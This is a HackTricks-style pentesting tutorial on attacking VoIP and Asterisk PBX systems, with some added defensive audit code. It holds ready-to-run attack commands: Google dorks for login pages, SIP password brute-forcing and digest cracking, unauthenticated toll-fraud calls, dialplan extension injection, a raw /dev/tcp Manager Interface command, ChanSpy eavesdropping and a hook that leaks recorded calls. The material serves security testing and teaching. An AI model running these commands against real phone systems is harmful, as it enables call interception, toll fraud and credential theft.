Pentesting VoIP
☁️ HackTricks Cloud ☁️🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
VoIP Basic Information
To start learning about how VoIP works check:
{% content-ref url="basic-voip-protocols/" %} basic-voip-protocols {% endcontent-ref %}
VoIP Enumeration
Telephone Numbers
One of the first steps a Red Team can take is to search for the phone numbers used to contact the company, using OSINT tools, Google searches or by scraping its web pages.
Once you have the telephone numbers you could use online services to identify the operator:
- https://www.numberingplans.com/?page=analysis&sub=phonenr
- https://mobilenumbertracker.com/
- https://www.whitepages.com/
- https://www.twilio.com/lookup
Knowing whether the operator provides VoIP services you can tell if the company is using VoIP... Moreover, it's possible that the company hasn't hired VoIP services but is using PSTN cards to connect its own VoIP PBX to the traditional telephony network.
Things such as automated responses or hold music usually indicate that VoIP is being used.
Google Dorks
# Grandstream phones
intitle:"Grandstream Device Configuration" Password
intitle:"Grandstream Device Configuration" (intext:password & intext:"Grandstream Device Configuration" & intext:"Grandstream Networks" | inurl:cgi-bin) -.com|org
# Cisco Callmanager
inurl:"ccmuser/logon.asp"
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button"
# Cisco phones
inurl:"NetworkConfiguration" cisco
# Linksys phones
intitle:"Sipura SPA Configuration"
# Snom phones
intitle:"snom" intext:"Welcome to Your Phone!" inurl:line_login.htm
# Polycom SoundPoint IP & phones
intitle:"SoundPoint IP Configuration Utility - Registration"
"Welcome to Polycom Web Configuration Utility" "Login as" "Password"
intext: "Welcome to Polycom Web Configuration Utility" intitle:"Polycom - Configuration Utility" inurl:"coreConf.htm"
intitle:"Polycom Login" inurl:"/login.html"
intitle:"Polycom Login" -.com
# Elastix
intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL"
# FreePBX
inurl:"maint/index.php?FreePBX" intitle:"FreePBX" intext:"FreePBX Administration"
OSINT information
Any other OSINT enumeration that helps identify the VoIP software in use will be useful to a Red Team.
Network Enumeration
- nmap is capable of scanning UDP services, but because of the number of UDP services being scanned it's very slow and might not be very accurate with this kind of service.
- svmap from SIPVicious (sudo apt install sipvicious): will locate SIP services in the indicated network. svmap is easy to block because it uses the User-Agent friendly-scanner, but you could modify the code in /usr/share/sipvicious/sipvicious and change it.
# Use --fp to fingerprint the services
svmap 192.168.1.0/24 -p 5060-5070 [--fp]
- sipscan.py from sippts: Sipscan is a very fast scanner for SIP services over UDP, TCP or TLS. It uses multithreading and can scan large network ranges. It allows you to easily indicate a port range, scan both TCP & UDP, use another method (by default it uses OPTIONS) and specify a different User-Agent (and more).
./sipscan.py -i 192.168.2.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]
[!] IP/Network: 192.168.2.0/24
[!] Port range: 5060-5080
[!] Protocol: UDP, TCP, TLS
[!] Method to scan: REGISTER
[!] Customized User-Agent: Cisco
[!] Used threads: 200
- metasploit:
auxiliary/scanner/sip/options_tcp normal No SIP Endpoint Scanner (TCP)
auxiliary/scanner/sip/options normal No SIP Endpoint Scanner (UDP)
Extra Network Enumeration
The PBX could also be exposing other network services such as:
- 69/UDP (TFTP): Firmware updates
- 80 (HTTP) / 443 (HTTPS): To manage the device from the web
- 389 (LDAP): Alternative store for user information
- 3306 (MySQL): MySQL database
- 5038 (Manager): Asterisk Manager Interface, allows Asterisk to be controlled from other platforms
- 5222 (XMPP): Messages using Jabber
- 5432 (PostgreSQL): PostgreSQL database
- And others...
Extension Enumeration
Extensions in a PBX (Private Branch Exchange) system refer to the unique internal identifiers assigned to individual phone lines, devices, or users within an organization or business. Extensions make it possible to route calls within the organization efficiently, without the need for individual external phone numbers for each user or device.
- svwar from SIPVicious (sudo apt install sipvicious): svwar is a free SIP PBX extension line scanner. In concept it works similarly to traditional wardialers by guessing a range of extensions or a given list of extensions.
svwar 192.168.1.15 -p5060 -e100-300 -m REGISTER
- sipexten.py from sippts: Sipexten identifies extensions on a SIP server. Sipexten can check large network and port ranges.
python3 sipexten.py -i 192.168.2.203 -r 5080 -e 100-200
- metasploit: You can also enumerate extensions/usernames with metasploit:
auxiliary/scanner/sip/enumerator_tcp normal No SIP Username Enumerator (TCP)
auxiliary/scanner/sip/enumerator normal No SIP Username Enumerator (UDP)
- enumiax (apt install enumiax): enumIAX is an Inter Asterisk Exchange protocol username brute-force enumerator. enumIAX may operate in two distinct modes: Sequential Username Guessing or Dictionary Attack.
enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.1 # Use dictionary
enumiax -v -m3 -M3 192.168.1.1
VoIP Attacks
Password Brute-Force
Having discovered the PBX and some extensions/usernames, a Red Team could try to authenticate via the REGISTER method to an extension using a dictionary of common passwords to brute force the authentication.
{% hint style="danger" %} Note that a username can be the same as the extension, but this practice may vary depending on the PBX system, its configuration, and the organization's preferences...
If the username is not the same as the extension, you will need to figure out the username to brute-force it. {% endhint %}
- svcrack from SIPVicious (sudo apt install sipvicious): svcrack allows you to crack the password for a specific username/extension on a PBX.
svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 #Crack known username
svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions
- sipcrack.py from sippts: SIP Digest Crack is a tool to crack the digest authentications within the SIP protocol.
{% code overflow="wrap" %}
python3 sipcrack.py -i 192.168.2.203 -r 5080 -e 100,101,103-105 -w wordlist/rockyou.txt
{% endcode %}
- Metasploit:
VoIP Sniffing
If you find VoIP equipment inside an open Wifi network, you could sniff all the information. Moreover, if you are inside a more closed network (connected via Ethernet or protected Wifi) you could perform MitM attacks such as ARP spoofing between the PBX and the gateway in order to sniff the information.
Among the network information, you could find web credentials to manage the equipment, user extensions, usernames, IP addresses, even hashed passwords and RTP packets that you could replay to hear the conversation, and more.
To get this information you could use tools such as Wireshark or tcpdump, but a tool created specifically to sniff VoIP conversations is ucsniff.
{% hint style="danger" %}
Note that if TLS is used in the SIP communication you won't be able to see the SIP communication in clear.
The same will happen if SRTP or ZRTP is used: RTP packets won't be in clear text.
{% endhint %}
SIP credentials
Check this example to better understand a SIP REGISTER exchange and how credentials are sent.
- sipdump & sipcrack, part of sipcrack (apt-get install sipcrack): these tools can extract the SIP digest authentications from a pcap and brute-force them.
sipdump -p net-capture.pcap sip-creds.txt
sipcrack sip-creds.txt -w dict.txt
- siptshark.py, sipdump.py, sipcrack.py from sippts:
  - SipTshark extracts SIP protocol data from a PCAP file.
  - SipDump extracts SIP Digest authentications from a PCAP file.
  - SIP Digest Crack is a tool to crack the digest authentications within the SIP protocol.
python3 siptshark.py -f captura3.pcap [-filter auth]
python3 sipdump.py -f captura3.pcap -o data.txt
python3 sipcrack.py -f data.txt -w wordlist/rockyou.txt
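As an added illustration (not code from the page, SIPVicious or sippts), the following Python parses the Authorization header of a constructed REGISTER and recomputes the RFC 2617 digest exactly as the PBX does to verify it. Every input to the hash except the password (username, realm, nonce, uri, method) plus the response itself travels in the clear, which is why a captured exchange can be checked offline against a wordlist and why SIP over TLS matters. The host name, nonce and extension are made up.

```python
import hashlib
import re


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce):
    """RFC 2617 digest without qop, as most SIP phones and PBXs use it:
    MD5( MD5(user:realm:password) : nonce : MD5(method:uri) )"""
    ha1 = md5_hex(f"{username}:{realm}:{password}")
    ha2 = md5_hex(f"{method}:{uri}")
    return md5_hex(f"{ha1}:{nonce}:{ha2}")


def parse_authorization(message: str) -> dict:
    """Return the key/value pairs of the Digest Authorization header."""
    m = re.search(r"^Authorization:\s*Digest\s+(.*)$", message, re.M | re.I)
    if not m:
        return {}
    pairs = re.findall(r'(\w+)=("[^"]*"|[^,\s]+)', m.group(1))
    return {k: v.strip('"') for k, v in pairs}


def verify_register(message: str, password: str) -> bool:
    """What the PBX does: recompute the digest with the stored secret and
    compare it with the response the client sent."""
    auth = parse_authorization(message)
    method = message.split(" ", 1)[0]           # "REGISTER" from the request line
    expected = digest_response(auth["username"], auth["realm"], password,
                               method, auth["uri"], auth["nonce"])
    return expected == auth.get("response", "")


# Constructed sample: the REGISTER that extension 100 with password "1234"
# would send after a 401 challenge carrying nonce 3f2a1b9c (not a real capture).
SAMPLE_NONCE = "3f2a1b9c"
SAMPLE_RESPONSE = digest_response("100", "asterisk", "1234", "REGISTER",
                                  "sip:pbx.example.local", SAMPLE_NONCE)
SAMPLE_REGISTER = (
    "REGISTER sip:pbx.example.local SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.168.2.50:5060;branch=z9hG4bK-1\r\n"
    "From: <sip:100@pbx.example.local>;tag=a1\r\n"
    "To: <sip:100@pbx.example.local>\r\n"
    "Call-ID: 1@192.168.2.50\r\n"
    "CSeq: 2 REGISTER\r\n"
    'Authorization: Digest username="100", realm="asterisk", '
    f'nonce="{SAMPLE_NONCE}", uri="sip:pbx.example.local", '
    f'response="{SAMPLE_RESPONSE}", algorithm=MD5\r\n'
    "Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    auth = parse_authorization(SAMPLE_REGISTER)
    # Everything except the password is visible on the wire.
    print({k: auth[k] for k in ("username", "realm", "nonce", "uri", "response")})
    print("1234 accepted:", verify_register(SAMPLE_REGISTER, "1234"))
    print("secret accepted:", verify_register(SAMPLE_REGISTER, "secret"))
```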
DTMF codes
Not only SIP credentials can be found in the network traffic; it's also possible to find DTMF codes, which are used for example to access the voicemail.
It's possible to send these codes in SIP INFO messages, in audio or inside RTP packets. If the codes are inside RTP packets, you could cut that part of the conversation and use the tool multimon to extract them:
multimon -a DTMF -t wac pin.wav
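To show why DTMF carried in unencrypted RTP audio is recoverable (and why SRTP matters), here is an added example, not from the page or from multimon: it synthesizes a constructed four-digit "voicemail PIN" as dual-tone audio and decodes it with the Goertzel algorithm, the standard technique for detecting the eight DTMF frequencies. The detection threshold is tuned for the constructed amplitude.

```python
import math

RATE = 8000                       # narrowband telephony sample rate (G.711)
LOW = [697, 770, 852, 941]        # DTMF row tones (Hz)
HIGH = [1209, 1336, 1477, 1633]   # DTMF column tones (Hz)
KEYS = ["123A", "456B", "789C", "*0#D"]


def dtmf_tone(digit: str, ms: int = 100) -> list:
    """Synthesize one DTMF digit as float samples in [-1, 1] (constructed audio)."""
    r = next(i for i, row in enumerate(KEYS) if digit in row)
    c = KEYS[r].index(digit)
    return [0.5 * math.sin(2 * math.pi * LOW[r] * t / RATE)
            + 0.5 * math.sin(2 * math.pi * HIGH[c] * t / RATE)
            for t in range(RATE * ms // 1000)]


def goertzel_power(samples: list, freq: float) -> float:
    """Goertzel algorithm: energy of a single target frequency in the block,
    cheaper than an FFT when only eight frequencies matter."""
    k = 2 * math.cos(2 * math.pi * freq / RATE)
    s1 = s2 = 0.0
    for x in samples:
        s0 = x + k * s1 - s2
        s2, s1 = s1, s0
    return s1 * s1 + s2 * s2 - k * s1 * s2


def decode_digit(samples: list, threshold: float = 1e3) -> str:
    """Digit whose row and column tones dominate the block, '' if none found."""
    lows = [goertzel_power(samples, f) for f in LOW]
    highs = [goertzel_power(samples, f) for f in HIGH]
    if max(lows) < threshold or max(highs) < threshold:
        return ""
    return KEYS[lows.index(max(lows))][highs.index(max(highs))]


def decode_sequence(samples: list, ms: int = 100) -> str:
    """Walk the stream in tone-sized blocks and concatenate the digits found."""
    n = RATE * ms // 1000
    return "".join(decode_digit(samples[i:i + n])
                   for i in range(0, len(samples) - n + 1, n))


# Constructed "voicemail PIN" audio: the digits 1234, 100 ms each, with 100 ms
# of silence between them, as they would travel inside unencrypted RTP payloads.
SILENCE = [0.0] * (RATE // 10)
PIN_AUDIO = sum((dtmf_tone(d) + SILENCE for d in "1234"), [])

if __name__ == "__main__":
    print("recovered DTMF:", decode_sequence(PIN_AUDIO))   # 1234
```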
Asterisk Connection Misconfigurations
In Asterisk it's possible to allow a connection from a specific IP address or from any IP address:
host=10.10.10.10
host=dynamic
If an IP address is specified, the host won't need to send REGISTER requests every once in a while (the REGISTER packet carries the time to live, usually 30 min, which means that otherwise the phone will need to REGISTER every 30 min). However, it'll need to have open ports allowing connections from the VoIP server in order to receive calls.
Users can be defined with one of these types:
- type=user: the user can only receive calls as user.
- type=friend: it's possible to perform calls as peer and receive them as user (used with extensions).
- type=peer: it's possible to send and receive calls as peer (SIP trunks).
It's also possible to establish trust with the insecure variable:
- insecure=port: allows peer connections validated by IP.
- insecure=invite: doesn't require authentication for INVITE messages.
- insecure=port,invite: both.
{% hint style="warning" %}
When type=friend is used, the value of the host variable won't be used, so if an admin misconfigures a SIP trunk using that value, anyone will be able to connect to it.
For example, this configuration would be vulnerable:
host=10.10.10.10
insecure=port,invite
type=friend
{% endhint %}
Asterisk Context Misconfigurations
In Asterisk a context is a named container or section in the dial plan that groups together related extensions, actions, and rules. The dial plan is the core component of an Asterisk system, as it defines how incoming and outgoing calls are handled and routed. Contexts are used to organize the dial plan, manage access control, and provide separation between different parts of the system.
Each context is defined in the configuration file, typically in the extensions.conf file. Contexts are denoted by square brackets, with the context name enclosed within them. For example:
[my_context]
Inside the context, you define extensions (patterns of dialed numbers) and associate them with a series of actions or applications. These actions determine how the call is processed. For instance:
[my_context]
exten => 100,1,Answer()
exten => 100,n,Playback(welcome)
exten => 100,n,Hangup()
This example demonstrates a simple context called "my_context" with an extension "100". When someone dials 100, the call will be answered, a welcome message will be played, and then the call will be terminated.
This is another context that allows calling any other number:
[external]
exten => _X.,1,Dial(SIP/trunk/${EXTEN})
If the admin defines the default context as:
[default]
include => my_context
include => external
{% hint style="warning" %} Anyone will be able to use the server to call any other number (and the admin of the server will pay for the call). {% endhint %}
{% hint style="danger" %}
Moreover, by default the sip.conf file contains allowguest=true, so any attacker with no authentication will be able to call any other number.
{% endhint %}
- sipinvite.py from sippts: Sipinvite checks if a PBX server allows us to make calls without authentication. If the SIP server has an incorrect configuration, it will allow us to make calls to external numbers. It can also allow us to transfer the call to a second external number. For example, if your Asterisk server has a bad context configuration, it can accept INVITE requests without authorization. In this case, an attacker can make calls without knowing any user/pass.
{% code overflow="wrap" %}
# Trying to make a call to the number 555555555 (without auth) with source number 200.
python3 sipinvite.py -i 192.168.0.1 -fu 200 -tu 555555555 -v
# Trying to make a call to the number 555555555 (without auth) and transfer it to number 444444444.
python3 sipinvite.py -i 192.168.0.1 -tu 555555555 -t 444444444
{% endcode %}
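The connection and context misconfigurations described in these two sections can be found by auditing the configuration files themselves. The following added example (not from the page, Asterisk or sippts) parses constructed sip.conf and extensions.conf fragments with a minimal parser and reports allowguest being enabled (Asterisk's default when the option is absent), entries with insecure=invite (with type=friend, where the host= value does not limit who can use them), and contexts reachable from [default] through include => whose catch-all pattern dials out through a trunk.

```python
import re

TRUE_VALUES = {"yes", "true", "y", "t", "1", "on"}    # values Asterisk's ast_true() accepts

def parse_asterisk_conf(text: str) -> dict:
    """Minimal parser for Asterisk's [section] / key=value / key=>value files (order kept)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()          # ';' starts a comment
        head = re.match(r"\[([^\]]+)\]", line)
        if head:
            current = head.group(1)
            sections.setdefault(current, [])
        elif "=" in line:
            key, value = re.split(r"\s*=>?\s*", line, maxsplit=1)
            sections.setdefault(current, []).append((key.lower(), value))
    return sections

def audit_sip(sip_conf: str) -> list:
    """Flag the sip.conf settings discussed above: allowguest and insecure=invite."""
    conf = parse_asterisk_conf(sip_conf)
    general = dict(conf.pop("general", []))
    findings = []
    if general.get("allowguest", "yes").lower() in TRUE_VALUES:      # enabled when absent
        findings.append("general: allowguest enabled, unauthenticated calls accepted")
    for name, entries in conf.items():
        opts = dict(entries)
        insecure = set(opts.get("insecure", "").replace(" ", "").split(","))
        if "invite" in insecure:
            # With type=friend the host= value does not limit who can use the entry.
            findings.append(f"{name}: insecure=invite with type={opts.get('type')}, "
                            f"host={opts.get('host')}: INVITEs are not authenticated")
    return findings

def audit_dialplan(extensions_conf: str, entry: str = "default") -> list:
    """Follow include => from the entry context; report reachable catch-all Dial() patterns."""
    contexts = parse_asterisk_conf(extensions_conf)
    findings, seen, todo = [], set(), [entry]
    while todo:
        ctx = todo.pop()
        if ctx in seen:
            continue
        seen.add(ctx)
        for key, value in contexts.get(ctx, []):
            if key == "include":
                todo.append(value)
            elif key == "exten" and re.match(r"_X?[.!],\d+,Dial\(", value, re.I):
                findings.append(f"{ctx} (reachable from [{entry}]): {value}")
    return findings

# Constructed fragments reproducing the misconfigurations discussed above.
SIP_CONF = "[general]\nallowguest=yes\n[trunk]\nhost=10.10.10.10\ninsecure=port,invite\ntype=friend\n"
EXTENSIONS_CONF = """[my_context]
exten => 100,1,Answer()
exten => 100,n,Playback(welcome)
[external]
exten => _X.,1,Dial(SIP/trunk/${EXTEN})
[default]
include => my_context
include => external
"""
```

Running audit_sip(SIP_CONF) + audit_dialplan(EXTENSIONS_CONF) yields three findings; the same extensions.conf audited from my_context yields none, since that context never reaches [external].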
Misconfigured IVRS
IVRS stands for Interactive Voice Response System, a telephony technology that allows users to interact with a computerized system through voice or touch-tone inputs. IVRS is used to build automated call handling systems that offer a range of functionalities, such as providing information, routing calls, and capturing user input.
IVRS in VoIP systems typically consists of:
- Voice prompts: Pre-recorded audio messages that guide users through the IVR menu options and instructions.
- DTMF (Dual-Tone Multi-Frequency) signaling: Touch-tone inputs generated by pressing keys on the phone, which are used to navigate through the IVR menus and provide input.
- Call routing: Directing calls to the appropriate destination, such as specific departments, agents, or extensions based on user input.
- User input capture: Collecting information from callers, such as account numbers, case IDs, or any other relevant data.
- Integration with external systems: Connecting the IVR system to databases or other software systems to access or update information, perform actions, or trigger events.
In an Asterisk VoIP system, you can create an IVR using the dial plan (extensions.conf file) and various applications such as Background(), Playback(), Read(), and more. These applications help you play voice prompts, capture user input, and control the call flow.
Example of vulnerable configuration
exten => 0,100,Read(numbers,the_call,,,,5)
exten => 0,101,GotoIf($["${numbers}"="1"]?200)
exten => 0,102,GotoIf($["${numbers}"="2"]?300)
exten => 0,103,GotoIf($["${numbers}"=""]?100)
exten => 0,104,Dial(LOCAL/${numbers})
The previous is an example where the user is asked to press 1 to call one department, 2 to call another, or to enter the complete extension if they know it.
The vulnerability is that the length of the entered extension is not checked, so within the 5-second timeout a user could input a complete external number and it would be called.
Extension Injection
Using an extension such as:
exten => _X.,1,Dial(SIP/${EXTEN})
Where ${EXTEN} is the extension that will be called, when the extension 101 is dialed this is what would happen:
exten => 101,1,Dial(SIP/101)
However, if ${EXTEN} allows introducing more than numbers (as in older Asterisk versions), an attacker could introduce 101&SIP123123123 to call the phone number 123123123. And this would be the result:
exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123)
Therefore, a call to the extension 101 and to 123123123 will be sent and only the first one to pick up will be established... but if an attacker uses an extension that bypasses any match being performed but doesn't exist, he could inject a call only to the desired number.
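To see why the catch-all pattern accepts the injected string while a fixed-length one rejects it, here is an added example (not from the page or from Asterisk) that implements the core of Asterisk's extension pattern language (X, Z, N, [ranges], '.' and '!') and contrasts a Dial() fed the raw ${EXTEN} with one that only accepts digit-only input, the FILTER(0-9,${EXTEN}) idiom.

```python
import re


def pattern_to_regex(pattern: str) -> str:
    """Translate an Asterisk extension pattern into a Python regex.
    Alphabet: X = 0-9, Z = 1-9, N = 2-9, [1-5] = class, '.' = one or more
    of anything, '!' = zero or more. Without a leading '_' it is a literal."""
    if not pattern.startswith("_"):
        return re.escape(pattern)
    out, i, body = "", 0, pattern[1:]
    while i < len(body):
        ch = body[i]
        if ch == "[":
            j = body.index("]", i)
            out += "[" + body[i + 1:j] + "]"
            i = j
        else:
            out += {"X": "[0-9]", "Z": "[1-9]", "N": "[2-9]",
                    ".": ".+", "!": ".*"}.get(ch, re.escape(ch))
        i += 1
    return out


def matches(pattern: str, dialed: str) -> bool:
    return re.fullmatch(pattern_to_regex(pattern), dialed) is not None


def naive_dial_target(pattern: str, dialed: str) -> str:
    """Channel string reaching Dial(SIP/${EXTEN}) under the catch-all pattern:
    whatever was dialed is pasted in unchanged."""
    return f"SIP/{dialed}" if matches(pattern, dialed) else ""


def hardened_dial_target(pattern: str, dialed: str) -> str:
    """Same, but the dialed string must also survive a digits-only filter
    (the FILTER(0-9,${EXTEN}) idiom) unchanged, so '&' or '/' never reach Dial()."""
    if not matches(pattern, dialed) or re.sub(r"[^0-9]", "", dialed) != dialed:
        return ""
    return f"SIP/{dialed}"


INJECTED = "101&SIP123123123"     # the string from the text above, dialed in place of 101
```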
Click2Call
Click2Call allows a web user (who for example might be interested in a product) to enter his telephone number to get called. Then a sales agent will be called, and when they pick up the phone the user will be called and connected with the agent.
A common Asterisk profile for this is:
[web_user]
secret = complex_password
deny = 0.0.0.0/0.0.0.0
permit = 0.0.0.0/0.0.0.0
displayconnects = yes
read = system,call,log,verbose,agent,user,config,dtmf,reporting,cdr,dialplan
write = system,call,agent,user,config,command,reporting,originate
- The previous profile allows ANY IP address to connect (if the password is known).
- To originate a call, as described above, no read permissions are necessary and only originate in write is needed.
With those permissions any IP knowing the password could connect and extract far more information than needed, for example:
{% code overflow="wrap" %}
# Get all the peers
exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecret:password\nEvents: off\n\nAction:Command\nCommand: sip show peers\n\nAction: logoff\n\n">&3 && cat <&3
{% endcode %}
More information or actions could be requested.
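The profile above can be checked automatically against the one permission Click2Call needs. This added example (not from the page or from Asterisk) reads a manager.conf-style section with configparser, reports every read/write class beyond write=originate, and flags a permit list that admits any source address; the hardened profile with a single permitted host (a made-up 10.10.10.20) is constructed for comparison.

```python
import configparser
import ipaddress

# AMI permission classes a Click2Call integration needs: just the ability to
# originate a call, nothing to read back.
REQUIRED = {"read": set(), "write": {"originate"}}


def parse_manager_conf(text: str) -> configparser.ConfigParser:
    """manager.conf uses [section] / key = value with unique keys, so configparser fits."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return cp


def split_classes(value: str) -> set:
    return {c.strip() for c in value.split(",") if c.strip()}


def allows_any_source(section) -> bool:
    """True when permit= admits every address. deny is evaluated first and permit
    re-opens, so deny=0.0.0.0/0.0.0.0 followed by permit=0.0.0.0/0.0.0.0 is wide open."""
    for net in section.get("permit", "").split(","):
        net = net.strip()
        if net and ipaddress.ip_network(net, strict=False).prefixlen == 0:
            return True
    return False


def audit_manager_user(text: str, user: str) -> list:
    """Report permissions beyond REQUIRED and an unrestricted permit list."""
    sec = parse_manager_conf(text)[user]
    findings = []
    for cls in ("read", "write"):
        extra = split_classes(sec.get(cls, "")) - REQUIRED[cls]
        if extra:
            findings.append(f"{user}: {cls} grants unneeded classes {sorted(extra)}")
    if allows_any_source(sec):
        findings.append(f"{user}: permit admits any source address")
    return findings


# Constructed profiles: the over-privileged one from above next to a least-privilege
# one that only lets the web front-end originate calls from a single host.
WEAK = """
[web_user]
secret = complex_password
deny = 0.0.0.0/0.0.0.0
permit = 0.0.0.0/0.0.0.0
read = system,call,log,verbose,agent,user,config,dtmf,reporting,cdr,dialplan
write = system,call,agent,user,config,command,reporting,originate
"""
HARDENED = """
[web_user]
secret = complex_password
deny = 0.0.0.0/0.0.0.0
permit = 10.10.10.20/255.255.255.255
read =
write = originate
"""
```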
Eavesdropping
In Asterisk it's possible to use the command ChanSpy, indicating the extension(s) to monitor (or all of them), to hear conversations that are happening. This command needs to be assigned to an extension.
For example, exten => 333,1,ChanSpy('all',qb) indicates that if you call the extension 333, it will monitor all the extensions and start listening whenever a new conversation starts (b) in quiet mode (q), as we don't want to interact with it. You can go from one conversation to another by pressing *, or by dialing the extension number.
It's also possible to use ExtenSpy to monitor one extension only.
Instead of listening to the conversations, it's possible to record them to files using an extension such as:
{% code overflow="wrap" %}
[recorded-context]
exten => _X.,1,Set(NAME=/tmp/${CONTEXT}_${EXTEN}_${CALLERID(num)}_${UNIQUEID}.wav)
exten => _X.,2,MixMonitor(${NAME})
{% endcode %}
Calls will be saved in /tmp.
You could even make Asterisk execute a script that will leak the call when it ends:
exten => h,1,System(/tmp/leak_conv.sh &)
RTP Injection
It's possible to insert a .wav into conversations using tools such as rtpinsertsound (sudo apt install rtpinsertsound) and rtpmixsound (sudo apt install rtpmixsound).
Or you could use the scripts from http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/ to scan conversations (rtpscan.pl), send a .wav to a conversation (rtpsend.pl) and insert noise in a conversation (rtpflood.pl).
DoS
There are several ways to try to achieve DoS in VoIP servers.
- IAXFlooder: floods the IAX protocol used by Asterisk.
- inviteflood: a tool to perform SIP/SDP INVITE message flooding over UDP/IP.
- rtpflood: sends several well-formed RTP packets. It's necessary to know the RTP ports in use (sniff first).
- SIPp: allows analyzing and generating SIP traffic, so it can also be used for DoS.
- SIPsak: SIP swiss army knife. Can also be used to perform SIP attacks.
- Fuzzers: protos-sip, voiper.